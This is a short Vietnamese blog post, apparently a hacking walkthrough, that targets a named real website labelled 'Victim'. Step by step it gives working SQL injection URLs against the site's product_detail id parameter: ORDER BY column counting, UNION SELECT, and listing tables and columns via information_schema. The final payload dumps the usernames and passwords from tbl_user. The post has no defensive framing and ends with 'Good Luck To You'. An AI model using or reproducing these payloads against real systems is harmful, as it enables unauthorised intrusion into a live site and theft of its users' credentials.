Victim: http://www.woodpelletvietnam.vn
Khai thác:
Order By:
http://www.woodpelletvietnam.vn/?frame=product_detail&id=640 order by 22-- -
Union Select:
http://www.woodpelletvietnam.vn/?frame=product_detail&id=-640 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- -
Get Table:
http://www.woodpelletvietnam.vn/?frame=product_detail&id=-640 UNION SELECT 1,2,unhex(hex(group_concat(/*!table_name*/))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.tables where table_schema=database()-- -
Do các table bị ẩn đi nên tôi dùng hàm: Unhex(hex( để show các table ra.
=> tbl_user
Get Column:
http://www.woodpelletvietnam.vn/?frame=product_detail&id=-640 UNION SELECT 1,2,unhex(hex(group_concat(/*!column_name*/))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.columns where table_schema=database()
=> UID, PWD
Bạn nào có kinh nghiệm đoán cột thì khỏi dùng tới bước này
Get thông tin account:
http://www.woodpelletvietnam.vn/?frame=product_detail&id=-640 UNION SELECT 1,2,unhex(hex(group_concat(uid,0x7c,pwd))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from tbl_user
Good Luck To You
Không có nhận xét nào:
Đăng nhận xét